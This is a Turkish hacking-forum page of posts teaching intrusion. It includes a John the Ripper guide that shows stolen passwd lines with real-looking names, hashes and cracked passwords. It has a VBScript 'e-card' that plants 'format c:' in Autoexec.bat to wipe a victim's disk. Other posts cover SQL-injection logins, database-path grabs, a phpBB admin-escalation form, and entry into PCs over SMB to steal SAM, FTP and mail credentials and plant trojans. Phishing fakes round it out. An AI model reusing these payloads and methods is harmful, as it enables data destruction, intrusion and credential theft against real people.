| Sayfalarım |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
Forum - Genel bakış
=> Daha kayıt olmadın mı?
Forum - Karisik
| Sınıf | Postalar | Son kayıt: | Örnek forum
Bu forumu Login sayfasındaki Ekstralar=>Forum=>Kategoriler den yönetebilir, silebilirsin | 12 | Jamesthuts
09.04.2020, 04:46 (UTC) | SİFRE BULMA VER KIRMA
ŞİFRE BULMA VE KIRMA
John The Ripper Programıyla
Acc kirmak icin passwd diye adlandirilan dosyalardan elinizde bulunmasi lazim bunu bazi yeni isp lerin ftplerinden (oranin ftp kullanici iseniz genelde etc/passwd dizininde bulunurlar) cekmenize izin verirler.Anonymous baglantilarda bu dosyalari cekmenize izin verilmez. Bu tip dosyalari toparladiktan sonra. John The ripper programini cekmelisiniz.
Simdi John da kendiliginden 3 adet kirma bicimi var. Bunlar: ALPHA : Sadece harfler DIGITS : Sadece rakamlar ALL : Hepsi
Simdi John.ini dosyasını açtıgınızda oradan kullanacagınız bicimi bulun. Mesela ALPHA yi bulalım. Bulduk Simdi altta Minimum ve Maximum lenght var. Bunlar en az ve en cok hane sayısıdır. SOL dışında Turkiye'deki butun ISP lerde minimum 4 maximum 8 hane vardir. Tamam bunuda ayarladık diyelim. Daha sonra dos komut satırında, Şunları yazın: JOHN dosyaadi -i:bicim -beep (burada dosya adi bizim netten cektigimiz passwd dosyasi oluyor. Burda bicim yerine ALL ALPHA veya DIGITS yazicaksiniz. BEEP ise her pass kirdiginda bip sesi cikarmasini saglar. Örnek : John passwd.txt -i:ALL -beep heee bide wordlist ile Kirma Yöntemi vardir. Bu Yöntem Çok Degi******:ilk önce bir wordlist yaratirsiniz (Çok iyi Bir Arsiv Hazirladim!!!Kesin Bulundurun!! Woodlist John butun harfleri ve digitleri teker teker deneyecegine sizin verdiginiz Dosyadaki kelimeleri dener!!
Kullanim Yöntemi ise:: john <dosya adi> -w:<wordlist adi> -beep
------------John The Ripper Kullanma Kilavuzu-----------
John the Ripper(kisaca John amca) bence piyasada bulabilceginiz en baba unix passwd cracker dir.simdi siz herhangi bir yöntemle passwd yi cektiniz.Ama birinci soru bu passwd shadowed mu.Shadowed passwd lerde sadece o user in sifresinin shadow file daki yerini belirten bi sayi olur ve o sayiya göre makine shadow file a bakar ve o username icin girelen password ile dosyadaki password u karsilastirir. Yani asil almaniz gereken dosya shadowed sitemlerde /etc/shadow dur ama bu dosyaya erisim hakki sadece super user a aittir.(root)Yani sikar biraz. Kisaca Shdowed bi dosya Shadow file olmadan bi bok a yaramaz.Kiramazsiniz Alin size Shodowed ve un Shadowed passwd örnekleri:: Bu satirlar shadowed bi passwd dosyasindan alinmistir(ispronet Clansman'dan aldım lawuk shadowed u cekmis euheuhe)
root:*:0:0:finland.ispro.net.tr,ISPRO:/root:/usr/local/bin/tcsh
toor:*:0:0:Bourne-again Superuser:/root
xten:*:67:67:X-10 daemon:/usr/local/xten:/nonexistent
ilk satiri inceleyelim
s.N= shadow nosu=shadow file daki no su
|user| |s.N| |ayrintilar| |dizini| |shell dizini ve turu|
root:*:0:0:finland.ispro.net.tr,ISPRO:/root:/usr/local/bin/tcsh
Bu satirlarda shadow lanmamis passwd den:: (Bm -Net)
atabarut:iP0nvdXsd0bE2:504:100:Necdet Atabarut:/home/atabarut:/bin/sh
abali:btf6TGc5jaCwY:505:100:Muammer Abali:/home/abali:/usr/local/bin/dmenu
ceyhun:7kTb6N0tEaTcE:508:100:Ceyhun Ors:/home/ceyhun:/usr/local/bin/dmenu
kadircan:xt4UmVJxTBpbw:507:100:Kadircan Abali:/home/kadircan:/usr/local/bin/dmenu
Sanirim bunda incelemeye gerek yok olay acik.Ayni seyler gecerli.
-----------şimdi gelelim kırma işlemine------------
Benim tavsiyem Wordlist yani kelime listesi kullanmaniz. Eger Wordlist ne derseniz belli sayida harfin tum kombinasyonlarinin
her satirda bir kelime olmak uzere metin dosyasi haline getirilmisidir. Wordlist olusturmak icin meliksah aganin Sibop unu tavsiye ederim. (8 karakterli bir wordlist= 1.5 GB)
------John un wordlistli kirma komutu-------
john -wordfile:wordlist dosyasini buraya yazininiz -pwfile: sifredosyasini buraya yaziniz. > kirilan sifrelerin kaydedilecegi dosya adini buraya yaziniz. size bi tavsiye 4 karakterli sadece sayidan olusan bi wordlist hazirlayin (0.5 mb bile tutmaz)Dogum tarihini sifre yapanlari yakalarsininiz. ha bu arada son kisma kayit dosyasi yazdiimiz icin eger bi bokluk ciksa bile john bisey demicektir.sasirmayin herhangi bir hata falan verirse bunlarda o yazdigimiz dosyaya kaydedilecektir. islem bittinde bu dosyayi herhangi bir metin editöru ile acip bakabilirsiniz. yada kayit dosyasi kullanmadan yapin gerci tavsiye etmem.Format falan atarsaniz yada john.pot u bi sekilde kayberderseniz. kirdiklariniz gider.Ama kayit dosyasi bu riski kaldirir.
------Kayıt dosyasi olmadan kirma komutu------------
john -wordfile:listedosyasi -pwfile:sifredosyasi bu komut ile kirdiginizda sifreler ekrana cikar.
-------------------örnek verim------------------
John the Ripper Version 1.4 Copyright (c) 1996,97 by Solar Designer Loaded 201 passwords with 170 different salts (DES) onguru10 (onguru) aytac11 (ksoytac) aytac11 (ksaytac) ali19 (ayata) tunay94 (tunay) ofalay96 (ofalay) hyb96 (ferhan )hyb96 (ertugrul) tatko97 (tatko) uler97 (mukaddes) kbc97 (kbc) susen97 (susen) ttggrd97 (ttggrd)bircan97 (bircan) bilal97 (bilal) ykocak97 (ykocak) aaker97 (aaker) levent97 (levente) aristo97 (aristo) Parantez icindekiler usernamedir.
Sonradan bu kirilan acc leri tekrar cikartmak isterseniz john -show sifredosyasi yaziniz.
-------------------------şimdi gecelim Single Mod a--------------------
Single mod da john amca sadece passwordu ile kullanici ayrintilari yada username i yakin olan sifreleri kirar.hasan-hasan98 gibi yada ayrintilarda amcuk insaat as yaziyorsa.hasan-amcukins gibi. Cok hizlidir 5 dk da ato dan 90 tane acc kirarsiniz.Bu komut cok faydalidir ama herkes ilk bunla kiracagi icin kircaganiz acc lar coktan ****** olmus herkesin eline gecmistir.
Bu yuzden eger saglikli bi acc istiyorsaniz.Diger modlarda kiriniz.Komut ise söyledir. John -single dosyaadi>kayitdosyasi kayit dosyasi olayina tekrar girmicem heralde kapmissinizdir.
-------------------------------incremental Mod----------------------------
John amca incremental mod da o an rastgele karakter kombinasyonlari ureterek (eger ayar ellenmezse kafadan(default) 8 karakterdir) bunlari sifre olarak dener. Bu da sizi wordlist kullanmaktan bi derece kurtarir ama asla wordlist kadar hizli diildir ve wordlist kadar cok kiramaz.Ayrica hic durmaz bu ctrl-break cekerek siz durduracaksininiz.Bu modda kayit dosyasi tavsiye etmem cunku uzun sure bi sey kirmadiginda anlayamaz,bu yuzden de ne zaman kapatmaniz gerektiini kestirmezsiniz.
--------------Komut-------------
John -incremental:xxxx dosyaadi burdaki xxxx incremental in cesitidir.Buraya all yazarsaniz tum karakterler. Digits yazarsaniz sayilar(dogum tarihini sifre olarak kullananlar icin birebir).Alpha yazarsaniz harfler uretilir.
Temel Komutlar bu kadar ha bide unutmadan BEEP olayi var yazdigimiz bu komutlarin herhangi birine -beep eklerseniz her sifre bulduunda pc hoparlörunden biiiip sesi gelir.Ben bunu hep kullanirim.Yan odada Tv seyrederken Pc odamda sifre kirar ve biiip sesini duyunca pc nin basina kosarim hemen.
---------------------------Son------------------------
Ufak bir not: Wordlistler degisken olduklari icin bu sayfada yayinlanmamistir. ister kendiniz yapin ister bir yerlerden bulun.Biz turkiyeli oldugumuz icin yabancilarin yaptiklari wordlistleri kullanmayin
| 3 | AJHD6fHEOEi
24.12.2014, 10:18 (UTC) | DÜSMANINIZA BIR MAIL
Aşağıda yazdığım kodları html şeklinde kurbana yollıyacaksınız hepsi bu kadar
KENDİ PC NİZDE KESİNLİKLE DENEMEYİN !!!!
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>E-kart Seni seviyorum</title>
</head>
<body>
<script language="VBSCRIPT">
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("C:Autoexec.bat", True)
a.WriteLine("format c: /autotest /u /q")
a.Close
</script>
<p>Giriste acılan uyariya "HAYIR" dediyseniz <a
href="<i>javascript</i>:reload()">Malesef e-kart ınız calısmayacaktır.</p>
</body>
</html>
eğer karşıdaki kişi karşısına çıkan uyarıya evet derse o kişinin bilgisayarı yalan olmuştur.kolay gelsin.........
H@ckr@l93 | 0 | - | Acemi Hackciler Buraya
domain hack'e yeni baslayanlar icin gayet güzel anlasilabilir bir döküman .
ir hedef siteye saLdırı yöntemLeri..
Basitten zora doğru bir sıraLama yaptım..EkLemek istedikLeriniz warsa ekLeyiniz..
1.Whois
[Only registered and activated users can see links] ten whois çekiyoruzz..
Eğer mynet hotmail yaho faLansa hackLiyoruz.Eğer başKaysa onun fake kodunu hazırLıyoruzz.
HackLediğimiz maiLLe hosta gidip şifremizi istetiyoruz..
2.FLood
Denyo Launch War TooL gibi programLarLa fLood yaparak siteyi geçici oLarak erişimi yasakLayabiLiriz(Bandwith oLayı)
Ya da forumLarın anketLere fLood yaparak hata wermeLerini sağLayabiLirz.MeseLa mynetteki anketLere fLooD çekince sıfırLanıyor.
Tabi fLoodunda şekiLLeri war.BunLarı burada açıkLamak istemiyorumm.Ama en etkiLi fLood member regLemektir..AkLınızın bir köşesinde buLunsun..
3.Ftp brute Force..
Cracker Jack vcrack ftp gibi programLarLa ftp şifresini buLmak için brute force yapıLır..
İyi bir bağLantı we duruma göre kaLiteLi bir wordList gerektirebiLir..
Siz karşıdaki kşiye göre kendinizde hazırLayabiLirsinizz..
Bu programLarın kuLLanIMLarı forumLarımızda warr...
4.AçıkLar.
BeLkide üstünde sayfaLar yazıLabiLecekk böLüm..
Php asp sistemLerin birçok açığı warr.
ASP:
Çok kuLLanıLan webwiz we snitz forumLarı (binLerce)
HackLemek çok basit..
snitz forumLarı - snitz_forums_2000.mdb
Webwiz forumLarı - /admin/wwforum.mdb bu şekİlde main database e uLaşıp admin şifrelerini accessLe weya başka bir msb browserLa açarak buLabiLirsinizz..Sonra forum sizin emrinizde..
Asp nuke siteLerdede /db/main.mdb denersenizz db Dosyasını buLabiLirsiniz..
*Herhangi bir sitenin mdb si içinse O sitenin üyeLik sistemi portaLını buLarak bunLarı aspindir.com dan indirerek db yoLuna bakarsınızz..
BunLar
db/uyelik.mdb /db/members.mdb /db/sifreler.mdb oLabiLir..
Bu şekiLde googLedan aratak rastgeLe sitede hackLeyebiLirsinizz..
Bir mdb buLma yöntemi:
*Asp siteLerde üyeLik sistemLeri site yönetimi için portaLLar geneLLikLe geneL hazır scriptLerden yazıLmıştır...
.mdb hackLemek için herkez googLe dan inurl"x.mdb" oLarak aratır..
Şimdi benim diyeceği yöntem hiç bi yerde yoq we tamamen benim tarafımdan buyLunmuşturr.(:
[Only registered and activated users can see links] siteLerinden hazır bir üyeLik sistemi indiriyoruzz..
MeseLa xp üyeLik sistemini indirin.
Db yoLuna bakın..
Bakıyoruzz..
/db/uyelik.mdb
Şimdi googLe! a girip Xp üyeLik sistemi diye aratınn..
Ewet "xp üyelik sistemi" şekLinde aratığınızda karşınıza onLarca sayfa çıkacaktır..
Bu iLk 4 sayfada 20 1ye yakın sitede bu açıkTan war.
Çıkan sonuçLarın db Lerini indirip accessLe açarsanızz şifreLer eLinizdee..
*SqL İnjection
user 'or' şifre: 'or' bu şekiLde admin girişi yapabiLirsiniz..
*Php
Php sistemLerinde açığı war..
Php-nuke 5.5 te haber ekLeme açığı weya kuLLanıcı adı:admin şifre:'or true'
GüwenLik açıkLarı böLümünden sql injection açığına bakarsanızz göreceksiniz..
Phpbb forumLarında açıkLarı wardır.MeseLa örnek oLaarak phbb2.0.0 açığı bu forumdan kaLmadı deniLebiLir ama örnek oLsun diye weriyorum.
-------------------------------
<form method="post" action="[Only registered and activated users can see links] sayfası/admin/admin_ug_auth.php">
<p>User Level : <select name="userlevel">
<option value="admin" selected="selected">Administrator</option>
<option value="user">User</option>
</select></p>
<input type="hidden" name="private[1]" value="0" />
<input type="hidden" name="moderator[1]" value="0" />
<input type="hidden" name="mode" value="user" />
<input type="hidden" name="adv" value="" />
User ID: <input type="text" name="u" size="5"> <BR>
<input type="submit" name="submit" value="Submit" class="mainoption" />
<input type="reset" value="Reset" class="liteoption" name="reset" />
</form>
</body>
</html>
---------------------------------
Bu KoD yeni bir üyeye admin yetkisi werir.
Birda phpbb forumLarın 2.0.3 de db.php açığını duydum..
BuLabiLirsem yayınLarım..
Birde bazı .php dosyalarını çaLarak admin şifreLerine uLaşabiLiyorduk.
Sanırım config.php diydi.
Bunu FLashget webzip tarzı programLarLa kendi pcmize yükLeyebiLiyoruz..
*php maiLList açığı
GoogLe dan aratıp vuLduunuz php maiLListLerin sonuna /ml_config.dat ekLeyerek admin şifresine uLaşabiLirsiniz..
*Cgi script açıkLarı..
WebBBS Scriptleri
----
WebBBS - Bulletin Board System (Bildiri Tahtası Sistemi) Bu sistem yukarıda size örneklediğim gibi siteye mesaj atmak için kullanılır.
Bu sistem bünyesinde bu bildiri tahtalarına üye kimselerin kullanıcı adı/şifre kombinasyonlarını bulundurur.Böylelikle istediğiniz kişi adına
bildiri tahtasına mesaj gönderebilirsiniz.
Açık :[Only registered and activated users can see links] ya da [Only registered and activated users can see links]
WebAdvert Scriptleri (RekLamLar..)
WebAdverts (WebReklam) Bu scriptler sayesinde site yöneticisi sitede aldığı reklamları yayınlar.Her reklam için ayrı hesap vardır.
Bu açığı kullanarak kendi hazırladığınız bannerları sitede yayınlayabilirsiniz.Ayrıca diğer reklam verenlerin hesaplarını silmek ya da bannerlarını
değiştirmek elinizde.
Açık : [Only registered and activated users can see links] --> Şifrelerin bulunduğu .txt ..
[Only registered and activated users can see links] Scriptleri
wEBBSS İLe aynı şekiLde..
Açık : [Only registered and activated users can see links]
Açık : [Only registered and activated users can see links]
Açık : [Only registered and activated users can see links]
-------------------------
MaillistLer..
-------------------------
Açık : [Only registered and activated users can see links]
Açık : [Only registered and activated users can see links]
Açık : [Only registered and activated users can see links]
Açık : [Only registered and activated users can see links]
AçıkLARI BuLmak..
Scriptler hakkında geniş bilginiz yoksa ve yukarıda örneklediğim türden belirli başlı açıkları bilmiyorsanız Cgi Zayıflık Tarayıcılarını kullanmanızı öneririm.
Çeşitli tarayıcılar var bu alanda,bir kısmını deniyebilirsiniz.Önemli olan tarayıcının bünyesinde bulundurduğu açık sayısı.Bu çok önemlidir.Bir tarayıcı bünyesinde
ne kadar çok açık bulundurursa o kadar şansınız artar.Tarayıcınızın güncelleme seçeneği varsa sık sık yenilemenizi öneriririm.Güncelleme seçeneği yoksa birden fazla
tarayıcı kullanmalısınız.Unutmamanız gereken en önemli nokta ise her bulduğunuz scripti hackliyemeyeceğiniz.
Size daha pratik bir yol daha söyliyeyim,[Only registered and activated users can see links] - [Only registered and activated users can see links] gibi siteler kayıtlı olan web siteleri içerisinde her türlü kelimeyi arama özelliğine sahiptir.Bu
tip arama motorlarına metacrawler denir.Yabancı servis olarak size tavsiyem [Only registered and activated users can see links] ya da [Only registered and activated users can see links]
Örnek Aratabileceğiniz kelimeler;
cgi-bin
cgi-bin/örnek.pwd
cgi-bin/password.txt
cgi-bin/örnek.cfg
*ExpLoitLer
Eksik oLduğum konu bu fazla biLgim yok buLabiLeceğiniz adresLer..
AdresLer:
[Only registered and activated users can see links]
[Only registered and activated users can see links] gibi adreslerde buLabiLirsiniz..
5.ListPath
En sewdigiim hack yöntemLerinden biridir..
Bir php weya asp kodu çaLıştırarak o hostun tüm siteLere erişim hakkı sağLanır.ELmaLı şeker iLk çıktığında oLay yaratmıştı.
Fakat bu ListpathLeri nerden buLacağız??
Sitemizi inceLeyin we [Only registered and activated users can see links] a da arada sırada bakınn..
Bu oLay free hostLarda çaLışmaz..Denemeyin yani..
HackLemeniz için bi hosttan yer kiraLamanız Lazım..
6.Domain reg..
Eğer hedef site mutLaka hackLenmek zorundaysa hostun bitiş tarihi yakınsa hemen bittği gün hostu domaini ederekte yapabiLirsinizz..Sonra istediiniz gibi index atın cc iLe yapabiLirsiniz bu oLayı..
Yine sitemizde dağıtıLıyor..
7.Birtakım bazı açıkLar..
Unicode commander.pL gibi eski fakat hakkını wermemiz gereknn açıkLar..
Unicode birçok devLet sitesinde duruyor haLa..
Commander.pL service.pwd cgi/bin açıkLarı bunLardan bahsetmiyorum..Zaten her yerde war ayrıca bu açıkLarı buLunduran pek site kaLmadı..
emek benden saygı sizden | 1 | welanur_x
11.04.2021, 19:45 (UTC) | pcye girme detaylı anlatım hemde resimli süper anlatım
bunlar olmuyo tarzı seyler istemiyorum burda resimli anlatımı var hepsinin bole sacma sorulara cevap vermem
öncelikle en ayrıntılı pc hackli size sunuyorum starhack farkıyla
starhackte ayrıcalığa sahipsiniz
burdaki tum anlatım bana aittir verdiğim linklerdeki anlatımlar ise size yaralı olabilecek linklerdir bunu komple uygulayan birisi pcye girebilir bunu çok uzun yaptım tek tek ugraşmayın diye
burda hepsine değineceğim bunların dısında pcye girileceğini zannetmiyorum
r3x programı ile pcye girme: bununla yanlız 98 pclere girebilirsiniz yanlız ben size
bunun 139 portu en iyi tarayabilen bir scanner öz. vardır
http://thewolfteam.tripod.com/Egitim/win9x.htm
burda bunun resimli anlatımı var ve eger şi,freli ise kırabilirsiniz
essantial net tools ile pcye girme aylaşıma girer
http://www.wardom.org/pc-ye-girme-re...html?p=1147402
bunda resimli anlatım var
peki ağ paylaşımı şifresi nasıl kırılır
http://www.safesite.com/product.down...SiteID=digibuy
fakat bunda virüs sinyali verebilir dikkat edin av kapatmayı unutmayın
bunun kullanımını daha sonra burada vereceğim
139. porttan girme[bununla paylaşımlara girilir}
mesala bir ağ var siz o ağa girmek istiyosunuz ağ şifreli o zaman bu yola başvurabilirsiniz
http://www.resim.at/upload/out.php/i94_a3.bmp
http://www.resim.at/upload/out.php/i95_a2.bmp
eğer en baştaki kodu tekrar girip erişim engelledi derse
http://www.resim.at/upload/out.php/i97_a4.bmp
admin olarak gireceksek
http://www.resim.at/upload/out.php/i98_a5.bmp
burada
u:"administrator" ""
genelde şifre kullanmazlarama
u:"admin" ""
u:"administrator" "123456"
ama ben aşağıda vereceğim linkle şifre kırmay programını kullanımı ile anlattım
gibi şifreler deneyin 6 pcde genelde bu şifrelerden birini kullanıyordur
http://www.resim.at/upload/out.php/i99_a1.bmp
girdik ve paylaşımları gördük
http://www.resim.at/upload/out.php/i100_a12.bmp
yaptıktan sonra bilgisayarıma gidin ve pcye girin
fakat biraz daha ayrıntıya gireceğim
size nasıl msdostan dosya alınır
nasıl dosya pcye kopyalanır onuda anlatacağım
önce gerekli dizini gösteren resim
http://www.resim.at/upload/out.php/i...rntlargrnr.bmp
buda gördüğünüz resimdeki dosyaları nasıl kopyalayacağınız
http://www.resim.at/upload/out.php/i...alamaanlat.bmp
bu resimde ise karşı tarafa nasıl dosya yollayacağımıza değındim
http://www.resim.at/upload/out.php/i...syayollama.bmp
139 porttan paylaşıma girme bu kadardı
fakat daha bitmedi
peki bu oturum şifresi kırılmaz mı kırılır onunda anlatımı ile bu linkte
http://www.dosyaekle.com/do2.php?x=n...fre_kirici.zip
eğer burda yazıcı paylaşımı açıksa yazıcıdan yazıyı nasıl çıkartılacağını anlattım
--------------------------------------------------------------------------------
http://www.resim.at/upload/out.php/i99_a1.bmp
baktık yazıcı paylaşımı açık
o zaman dedimki karşı tarafta yazı yazalım
biraz korkutalım
http://www.resim.at/upload/out.php/i103_A9.bmp
byrdaki kodlarda lpt2 yazıcının kullandığı porttur onun için böle yazdık
sonra
http://www.resim.at/upload/out.php/i104_A10.bmp
burda en baştaki koda dikkat edi
copy con yazıcı.bat
bunu yazıyosunuz ondan sonra yazı yazmaya başlıyorsunuz
en son ctrl+z yapıyoruz
ve karşı pcde yazıyı yazmaya başlayan kodu yazıyoruz
yazılarınızı yazarak karşı tarafı korkutabilirsiniz
http://www.resim.at/upload/out.php/i106_a11.bmp
buyrun tamam
445. porttan girme bu açığı
genelde çoğu kullanıcı bundan habersizdir ve genelde yazıcı paylaşımı zamanlanmış görevler açık unutulurordan trojan sokabilirsiniz
ve trojan falan koyularak kandırılmaya çalısılır dikkat edin
http://www.resimekle.gen.tr/imagehos...s/eD462662.bmp
http://www.resimekle.gen.tr/imagehos...s/U4R62358.bmp
eger bu ekranlar dısında bir ekran şifre falan isterse şifrelidiryani şifreyi kırmak gerekir onuda hound 5.0 la kırabilirsiniz linki yukarıda
yukarıdaki şekilde girdiniz bir pcye o zaman şunları uygula***** pclerden şifreleri çalabilirsiniz
1. yöntem:roagent serverı ko***** nasıl olacak dersenizaçın ve sonra üstte gelişmiş var ordan altta ilk restarttan sonra çalış seçeneğine gelin ve pcnin gizli bi yere atın ilk restartan sonra çalısır
http://www.megasecurity.org/trojans/...Agent+2.1.9+SE
2.yöntem:trojan koyarsınız paylaşımlarına ama icon ve ismi şekilli olsun salak cok var yerler
prorat 1.9 se:http://rs19.rapidshare.com/files/20217899/Prorat.rar
3:yöntem:eğer baktınız c sürücüsüne adam tam paylaşım vermiş o zaman yapacaklarımızı sıralayacağım
4:msdosa gecelim
copy \\kurbanipno\*.sam c:\desktop
yazın adamın şifrelerinin bulunduğu dizinleri pcye indiririz
bunları bir sam okuyucu ile kırın
ben size link veriyorumanlatımı ile
http://www.lcpsoft.com/download/lcp504en.zip
http://www.dosyaekle.com/do2.php?x=sifre_kirma.doc bu anlatım
b}eğer c: ye komple gelirsek başlangıc sekmesine kadar gidebilir oraya trojan ko***** ilk restarttan sonra calışır
burdan altıyla fazla ugrasmanıza gerek yok
5:Program Files klasörüne girin ve GlobalSPACE (CuteFTP), LeapFTP, FlashFXP, AceFTP gibi FTP programlarinin dizinlerine girip sitelerin sifrelerinin tutuldugu (Örn: CuteFTP'de sm.dat) dosyalari çekin. Sonra çektiginiz bu dosyadaki sifreleri bir kirici program ile kirin
6:Program Files dizinindeki (varsa) ICQ dizinine girin. Burada kullandigi versiyonun adi olan dizine (2000b, 2001a, 2001b vs.) girip icq_numarasi.dat seklindeki dosyayi alip bir icq sifre kirici ile de bunu kirin
7/Windows/Application Data/Identities klasörüne girin. Sonra sirayla tikla***** {FE3255-35345....}/Microsoft/OutLook klasörüne girin. Buradaki inbox.dbx (Gelen Kutusu.dbx) gibi adamin Outlook maillerini kendi outlook dizininize çekip açabilirsiniz
fakat devam ediyoruz
bazı kişilerin 139. porttan pcye girdikleri komple yöntem aşağıdaki anlatımlar yani gizli paylaşımlardlr
şimdi size harddiske nasıl girilir onu anlatacağım öncelikle
r3x ile tarayın orda çıkan bütün pclerde uygulayabilirsiniz bunları
http://www.resimekle.gen.tr/imagehos...s/bvo40264.bmp
http://www.resimekle.gen.tr/imagehos...s/rO740251.bmp
http://www.resimekle.gen.tr/imagehos...s/cFp40539.bmp
http://www.resimekle.gen.tr/imagehos...s/7ma41759.bmp
işte bole girilir ama önce şifre kırıcıyı veriyorum
kırmak içinse oturum kullanıcısını bilmek gerekirbu guest olur genellikle ama
etkisiz olunca herhangi bir oturum şifresi ister
işte bu şifreleri kırar
http://www.dosyaekle.com/do2.php?x=2...bruteforce.zip
fakat size gizli paylaşımlara diğer girme yollarınıda gösteriyorum
http://www.resimekle.gen.tr/imagehos...s/hdt63262.bmp
girdikten sonra biraz bekleyin ve asağıdaki ekran gelir
http://www.resimekle.gen.tr/imagehos...s/hoo63564.bmp
diğer paylaşıma girme yolu ise
http://www.resimekle.gen.tr/imagehos...s/F6n63815.bmp
http://www.dosyaekle.com/do2.php?x=2...bruteforce.zip
bu yukarıdaki programın linki aramayın diye tekrar verdim bununla kırabilirsiniz
bu konu hakkında ufak bilgi
Win2000 yada XP kurarken çoğu insan (özellikle int.Cafeler) Admin hesabının şifresini boş bırakarak kurulum yapar. Hatta çogu zaman bunu bizlerde yaparız. Bu olay "gizli paylaşımlar" konusunda büyük bi güvenlik açığı oluşturur. Nedenmi? Gizli paylaşım ile bağlanıcağımız makinada eğer administrator hesabının şifresi yoksa, bizi o makinanın "administrator" kullanıcısı sanıyo olcak. Eğer kurulum sırasında Admin hesabına bir parola verilmişse bizden bunu istiycek. Eğer bir parola verilmemişse direk gizli paylaşımdan içeri girecek! Tabiki Guest hesabınında disable olması gerekiyoki buda default kurulumda herzaman disable olarak gelir. (Tekrar söylüyorum çoğu insan admin hesabının parolasını boş bırakıyo. Kendi bilgisayarlarınızda bu noktaya dikkat edin) Evet olay neymiş Gizli paylaşım ile erişeceğimiz bilgisayarın admin hesabının parolası olmamalıymış ve Guest hesabı disable olmalıymış!
şimdi geldik diğer yöntemlere
adsl modeme girmencelikle sunu belirteyim adslden pcye girilmez ama backdoor yapılarak girilebilir bunun için iyi network bilmeniz lazımshell kullanırlar
http://www.wardom.org/pcye-sizma-muk...im-t22123.html
bu linkte modeme girme resimli anlatılmış
adsl modemden kullanıcı adı ve şifresi çalma:öncelikle kullanıcı adı ve şifresinin bulunduğu yere gelin
sonra
http://rs9.rapidshare.com/files/1519...velationV2.zip
bunu şifrenin oldugu kutucugun ustune tutun ve şifre görünecektir
ve işte bir adsl accountuna sahip oldunuz
istediğiniz bir adslnin şifresini kırmak isterseniz kullanımı içinde
http://www.dosyaekle.com/do2.php?x=b..._kiricidir.zip
modem şifreleri
http://www.cirt.net/cgi-bin/passwd.pl
http://www.cyxla.com/passwords/passwords.html
bu anlatımla çok büyük bir rep haketmiş olmam lazım replerinizi esirgemeyin
bu kadar şimdilik yeter bi, dahaki sefere trojanlarla ve wingate ile pcye nasıl girilir onu anltacağım
rep esirgemeyin bunları yazana kadar anam ağladı beyler sırf siz için eliniz bir rep butonuna gitmesi lasım beyler
emegime saygı gösterin yeter
| 22 | Megan
05.12.2023, 10:53 (UTC) | Fakeeeee
--------------------------------------------------------------------------------
http://dosyam.net/?id=mgd4oz arkadaşlar ilk önce fake den anlamayalar için söylüyorum ilk önce fake yi not defteri ile açıyoruz son ra ctrl + f ye basıoruz @hotmail.com yazıoruz ordakileri silip kendi hotmail adresinizi yazıyoruz umarım işinize yarar karşı tarafa yutturmanız yeterli... | 1 | WHSVmOcINvd
24.12.2014, 21:25 (UTC) | ilgin bir fake
Değerli StarHack.Org üyeleri, son zamanlar da ilginç [bir html formatında mail geliyor.
Gelen mailde msn takip adlı bir eklentinin olduğunu ve kişi listenizdekilerin
Konuşmalarının takip edilebileceğini yazmışlar..
İlginç Bir Fake Dikkat Edin.
Değerli HackeriZ.CoM üyeleri, son zamanlar da ilginç bir html formatında mail geliyor.
Gelen mailde msn takip adlı bir eklentinin olduğunu ve kişi listenizdekilerin
Konuşmalarının takip edilebileceğini yazmışlar..
Program linki olarak http://www.microsoft.com/msnsecret/plus/12776354
Gibi bir link vermişler ama microsoftun linkine başka bir hosttaki trojanı gömmüşler.
Şüphelenmiş olsamda denemek maksadıyla linke tıkladım ve trojanı yedim..
Dikkat edin Bu mail çok dolaşmaya başladı..Aynen aktarıyorum
selametle..
__________________________________________________
Microsoft msn plus ile çıkardığı bir eklenti sayesinde kişi listenizdekilerin konuşmalarını izleyebiliyorsunuz.
Plus yüklü olması lazım ve sadece kişi listenizdekileri takip edebilirsiniz
Eklentiyi kurduktan sonra kişi listenizdekilerden birine sağ tıklayıp view diyorsunuz açılan pencerede
Kouşmaları izleyebiliyorsunuz.
Ebeveyn Takip eklentisi
Linke tıkla***** eklentiyi ücretsiz kurabilirsiniz
| 0 | - |
Bütün konular: 32 Bütün postalar: 39 Bütün kullanıcılar: 51 Şu anda Online olan (kayıtlı) kullanıcılar: Hiçkimse  |
|
|
|
|
|
|
|
|
|
|
|
|
Konu: <%CommentTitle%>
<%CommentBody%>
Bağlantı »Düzenle » Sil